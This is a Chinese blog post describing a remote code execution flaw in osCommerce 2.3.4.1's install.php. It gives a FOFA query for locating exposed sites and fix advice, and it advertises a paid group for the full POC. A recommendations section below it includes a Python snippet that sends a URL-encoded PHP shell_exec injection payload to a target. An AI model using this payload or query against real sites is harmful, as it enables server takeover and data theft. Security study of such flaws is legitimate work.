【漏洞复现】osCommerce install.php存在远程代码执行漏洞

于 2024-05-13 10:52:39 发布
阅读量747 收藏 20
点赞数 16
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52204925/article/details/138792935
版权

   免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

                                                                                                                                              

Ⅰ、漏洞描述

osCommerce是一个由自由软件开发社团开发并维护的在线商店解决方案。由于遵循开源软件开发和发布协议,它可以自由下载、安装和使用,并可以根据需要进行修改和发布。osCommerce 2.3.4.1容易受到通过install.php执行远程代码的影响。 远程攻击者可以将PHP代码插入db_database参数,然后使用configure.php页读取命令的执行输出。

osCommerce install.php存在远程代码执行漏洞,恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。

Ⅱ、fofa语句

body="www.oscommerce.com"

Ⅲ、漏洞复现

1、构造数据包

2、命令执行成功

Ⅳ、Nuclei-POC

Ⅴ、修复建议

1、将网络划分为不同的安全区域,以限制 RCE 攻击的潜在影响;

2、定期检查软件更新,并及时应用安全补丁;

3、设置安全访问控制策略。

完整POC及批量检测脚本请前往圈子获取,圈子每天不定时更新漏洞3-5篇,加入圈子即可进入内部群,近期漏洞更新列表如下,此表所更漏洞信息均可在内部群获取

 

 联系圈主立享优惠

月更列表和周更列表请前往交流群"ONE PIECE"获取链接,联系圈主进群,备注来意

往期全部漏洞合集内容可点击下方名片进入公众号主页,选择漏洞合集查看(点击右上角订阅可第一时间获取漏洞更新信息) 

微信公众号:伟大航路D

​​​

Love Seed
关注
  • 16
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
18年远程cve漏洞及利用对应exp
weixin_42373409的博客
09-14 814
CVE-2018-2628 Oracle Weblogic Server Deserialization RCE CVE-2018-2628 https://www.rapid7.com/db/modules/exploit/multi/misc/weblogic_deserialize CVE-2018-10933 libSSH Auth Bypass Exploit CVE-2018-10933 https://paper.seebug.org/720/https://github.com/.
osCommerce v2.3.4.1 英文版.zip
07-07
osCommerce是一套由自由软件开发社团开发并维护的在线商店的解决方案,osc具有易于操作的可视化安装界面、完善的前台商品展示和户在线购物车功能、强大的后台管理,还有运行速度快,国外很受推崇。官方并没有提供中文语言包,只能靠国内的一个组织汉化,可定制性相对差。 osCommerce v2.3.4.1 英文版 更新日志 *改进MySQLi在安装过程中的检测; *更新会话处理函数以返回正确的返回值类型; *忽略E_DEPRECATED PHP通知; *设置空的MySL sql_mode以兼容MySQL版本。 osCommerce截图   相关阅读 同类推荐:站长常用源码
osCommerce 3.0.2.zip
05-24
osCommerce是一套由自由软件开发社团开发并维护的在线商店的解决方案。由于遵循开源软件开发和发布协议,osCommerce可以自由下载、安装和使用,并可以根据自己的需要进行修改和发布,可以应用到任何的商业环境中,但是不能够利用本身进行营利性质的活动[修改]。osCommerce具有易于操作的可视化安装界面、完善的前台商品展示和户在线购物车功能、强大的后台管理,还有运行速度快,国外很受推崇。官方并没有提供中文语言包,只能靠国内的一个组织汉化,可定制性相对差。 osCommerce 3.0.2 更新日志: 新的管理应用: 分类 客户 服务 验证会话ID - 如果请求的
基于PHPosCommerce电子商务.zip
07-22
基于PHPosCommerce电子商务.zip
PHP实例开发源码-osCommerce电子商务.zip
10-15
PHP实例开发源码—osCommerce电子商务.zip PHP实例开发源码—osCommerce电子商务.zip PHP实例开发源码—osCommerce电子商务.zip
osCommerce 2.3.4.1.zip
05-25
osCommerce是一套由自由软件开发社团开发并维护的在线商店的解决方案,osc具有易于操作的可视化安装界面、完善的前台商品展示和户在线购物车功能、强大的后台管理,还有运行速度快,国外很受推崇。官方并没有提供中文语言包,只能靠国内的一个组织汉化,可定制性相对差。osCommerce 2.3.4.1 更新日志:2017-08-18*改进MySQLi在安装过程中的检测;*更新会话处理函数以返回正确的返回值类型;*忽略E_DEPRECATED PHP通知;*设置空的MySL sql_mode以兼容MySQL版本。
批量执行linux漏洞,osCommerce 2.3.4.1-远程代码执行漏洞(附批量Getshell脚本)_白帽子技术/思路_i春秋社区-分享你的技术,为安全加点温度....
weixin_36192634的博客
05-13 534
0x01 前言好几天没有写了,前两天又去Boom了,差点没缓过来。今天在exploit-db逛看到一个洞,也是install的地方,想去利用上次那个远程数据库技巧来尝试下,发现这个洞根本用不到,不过新手可以学习下哈,也可以收藏下,因为有时候在ctf线下赛的时候官方会拿一些国外的程序给你玩,最近也在写python的漏洞利用工具,欢迎关注我的github。0x02 环境0x03 漏洞利用过程1.我们先...
zencart configuration.php代码_自主识别的zen cart配置文件configuration.php
weixin_39938522的博客
03-08 142
如果你需要批量创建很多个zen cart网站?你是否是手动一个个安装生成配置文件configuration.php? 如果你管理着很多的zen cart网站和服务器,需要在不同的服务器间转移zen cart网站?你是否手工一个个修改配置文件configuration.php? 尽管你可以非常熟悉zen cart的配置文件,你仍然有可能出错,百密必有一疏啊。为此,我定义了一个自己识别适应的zen c...
magento php mysql_magento 资源配置 mysql4-install-0.1.0.php为什么没有执行
weixin_35349247的博客
01-27 123
展开全部对于任何一32313133353236313431303231363533e59b9ee7ad9431333361326333个更新频繁的项目来说,保持开发环境和生产环境的数据库同步是件很头疼的事情。Magento提供了一套系统,用版本化的资源迁移脚本来解决这个问题。上一章,我们为 Helloworld Blogpost 创建了一个模型。我们直接通过SQL语句“CREATE TABLE”来...
PHP实例开发源码—osCommerce电子商务.zip
11-12
PHP实例开发源码—osCommerce电子商务.zip
基于PHPosCommerce电子商务源码.zip
最新发布
08-27
基于PHPosCommerce电子商务源码.zip
基于PHPosCommerce php在线商城管理系统 简体中文版.zip
07-22
基于PHPosCommerce php在线商城管理系统 简体中文版.zip
PHP实例开发源码—osCommerce php在线商城管理系统 简体中文版.zip
11-22
PHP实例开发源码—osCommerce php在线商城管理系统 简体中文版.zip
ru.zip_oscommerce
09-23
oscommerce-2.2的语言包,该文件是俄罗斯语,安装使用需要一定经验.
zencart index.php,ZenCart深入二次开发-核心文件说明
weixin_35426913的博客
03-27 215
想对ZenCart深入了解的程序猿可以认真看看zencart的文件结构…1.大家可以看到ZenCart根目录index.php文件中第一句话是包含include目录下的application_top.php文件,如:require(’includes/application_top.php’);zencart系统中application_top.php负责的是初始化工作,比如加载配置文件inclu...
第十四课 php文件上传漏洞实践
weixin_30553777的博客
06-18 62
挖掘上传漏洞 常见上传函数 $_FILES move_uploaded_file等函数 搜索关键字 $_FILES move_uploaded_file 如何防止上传漏洞 自定义文件扩展名和路径 oscommerce-2.3.1.zip 转载于:https://www.cnblogs.com/idebug/p/11046154.html...
PHP实例开发源码——osCommerce php在线商城管理系统 简体中文版.zip
11-30
PHP实例开发源码——osCommerce php在线商城管理系统 简体中文版.zip
ec.rar_commerce_oscommerce
09-23
一个开源的电子商务程序,由单用户(oscommerce)修改成的多用户版本.
python如何检测目标url存在oscommerce远程代码执行漏洞
06-08
检测目标URL是否存在osCommerce远程代码执行漏洞,可以通过以下步骤进行: 1. 构造payload:构造一个可以触发osCommerce远程代码执行漏洞的payload,例如: ``` http://target.com/oscommerce-2.3.4/catalog/admin/categories.php?s=%27%29%3Becho%20shell_exec%28%24_GET%5Bcmd%5D%29%3Bdie%28%27%28 ``` 2. 发送payload:使用Python的requests库,发送构造的payload,例如: ```python import requests url = "http://target.com/oscommerce-2.3.4/catalog/admin/categories.php?s=%27%29%3Becho%20shell_exec%28%24_GET%5Bcmd%5D%29%3Bdie%28%27%28" response = requests.get(url) if "uid=" in response.text: print("目标存在osCommerce远程代码执行漏洞") else: print("目标不存在osCommerce远程代码执行漏洞") ``` 3. 解析响应:如果目标存在osCommerce远程代码执行漏洞,响应中应该包含一些可疑的字符或标识,例如"uid="等。 需要注意的是,使用此方法进行安全测试需要遵守法律和道德规范,不得用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值